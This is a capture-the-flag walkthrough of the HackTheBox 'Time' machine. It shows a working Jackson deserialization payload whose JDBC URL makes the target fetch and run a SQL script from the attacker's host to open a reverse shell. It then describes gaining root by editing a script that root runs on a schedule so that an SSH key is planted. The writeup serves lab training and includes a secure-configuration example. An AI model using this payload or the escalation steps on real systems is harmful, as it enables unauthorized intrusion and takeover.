Time — HackTheBox Writeup

Source

This is a practical walkthrough of the “Time” machine from HackTheBox. The machine is rated medium difficulty. Credit goes to egotisticalSW & felamos for making this machine available to us; base points for this machine are 30.

Passwords, hashes and flags will be redacted to encourage you to solve the challenge on your own.

Synopsis

“Time” is a medium-difficulty Linux machine that features an Apache server hosting a PHP website. The website’s homepage is an “Online JSON beautifier & validator”. Many websites offer APIs that return data in JSON format, and often the JSON has its whitespace stripped to reduce the size of the data transferred. This site gives you a quick and easy way to format the JSON so you can read it. The validation feature of the site is still in beta, and that is what we take advantage of: the backend uses the Jackson library prior to 2.9.9, whose polymorphic deserialization lets the client control the class to be deserialized. An attacker can leverage this deserialization vulnerability to trigger attacks such as Server-Side Request Forgery (SSRF) and remote code execution. We get initial access through this and escalate our privileges by exploiting a misconfigured shell script that runs with root privileges.

Skills Required

Web Enumeration
Linux Enumeration

Skills Learned

Jackson Deserialization

Enumeration

nmap

Nmap reveals that OpenSSH (22) and HTTP (80) are open on the target machine. Further to that, the target is an Ubuntu Linux server. BTW, I ran gobuster, checked the robots.txt file, and basically did every normal enumeration step to find extra details; unfortunately there’s nothing to be found.

Let’s intercept the web request using Burp Suite, send it to Repeater and check the response. Make sure to use the “validate” feature when intercepting the web request.

test
Validation failed

Even if you don’t use Burp, you’d get the same error on the homepage. A quick Google search turns up the recent CVE-2019-12384; there’s also an older one from 2017, CVE-2017-7525. TBH, I am not good with JSON stuff; fortunately I found that there’s already a POC available to get RCE through this vulnerability.
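To show what actually makes the “validate” feature exploitable, here is an added example (not code from the Time machine, whose backend source we never see) of a JSON validator wired to Jackson in the weak way and in the hardened way; the class `JsonValidator` and its method names are assumed for illustration.

```java
// Added example: the configuration difference that decides whether the wrapper-array
// form ["fully.qualified.ClassName", {...}] used by the CVE-2019-12384 PoC is honoured.
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

public class JsonValidator {

    // WEAK: enableDefaultTyping() tells Jackson to trust a class name embedded in the
    // input and instantiate it. With an Object.class target the expected encoding is the
    // wrapper array ["ClassName", {...}], so untrusted JSON chooses the class, which is
    // how the logback DriverManagerConnectionSource gadget gets constructed.
    static String validateUnsafe(String body) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();   // deprecated since 2.10 precisely because of this
        Object value = mapper.readValue(body, Object.class);
        return mapper.writeValueAsString(value);
    }

    // HARDENED: a beautifier/validator never needs polymorphic typing. Parsing into a
    // JsonNode tree keeps data as data: a class name in the input is just a string, and
    // nothing is instantiated. Upgrading jackson-databind is still required on top of this;
    // in 2.10+ any remaining default typing should use an allow-list PolymorphicTypeValidator.
    static String validateSafe(String body) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        JsonNode tree = mapper.readTree(body);   // throws on malformed JSON -> "Validation failed"
        return mapper.writerWithDefaultPrettyPrinter().writeValueAsString(tree);
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample input: the PoC's wrapper array with the JDBC URL redacted.
        String body = "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\","
            + "{\"url\":\"<redacted>\"}]";
        // Pretty-prints a two-element array; no class is loaded or instantiated.
        System.out.println(validateSafe(body));
        // validateUnsafe(body) on a vulnerable jackson-databind with logback-core and H2 on
        // the classpath would instead build the connection source from the attacker's URL.
    }
}
```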

Initial Access

Clone the repository to your local machine; we need to modify the code with our IP:Port. We need two things from the POC: “inject.sql” and “CVE.sh”. inject.sql is our payload and CVE.sh contains the code that calls the payload.

inject.sql

Modify the IP and Port.

CVE.sh

We need to remove the backslashes from the code. The command below will call the payload (inject.sql), which is served from our local HTTP server on port 9090. I changed the port to 9090, ’cause 8000 is already in use on my machine.

["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.24:9090/inject.sql'"}]

Set up an HTTP server in the directory containing inject.sql, and also start a netcat listener.

http server
netcat

Now copy the above code (changing the IP:Port) and submit it in the “validate” input field.

call our payload
reverse shell

Aight, *hacker voice* we are in. We got our reverse shell; now upgrade the shell.

user flag

Privilege Escalation

Now we need to escalate our privileges to root. Let’s run LinPEAS on the target to find any misconfigurations or outdated applications.

shell file

Check the permissions of this file.

permission

This script is owned by the current user. Let’s read its content.

content

It archives (zip) the content of the html directory and moves the archive into the root directory. If it can move files into /root, then obviously this script is running with root privileges. As you can see in the image below, the current user can’t access the /root directory.

no permission

If we run pspy, we’d see that a privileged user (root) executes this script every 10 seconds.

PSPY

So, we have permission to modify the script; let’s do it. Initially I tried a bash one-liner to get the reverse connection, but every 10 seconds it gets disconnected. When I checked the timestamp of the shell script, it was being restored to its original state every 5 minutes. We can retrieve the root flag using the copy command, or we can copy our SSH public key into the root directory and then SSH in as that user.

copy ssh pub key
ssh root
root flag

We got all the flags required to complete this machine.

Thank you for reading this blog. While attempting this challenge I learned so many things. This was a unique target with a unique vulnerability.

Reference

https://github.com/jas502n/CVE-2019-12384
https://access.redhat.com/security/cve/cve-2019-12384
https://blog.doyensec.com/2019/07/22/jackson-gadgets.html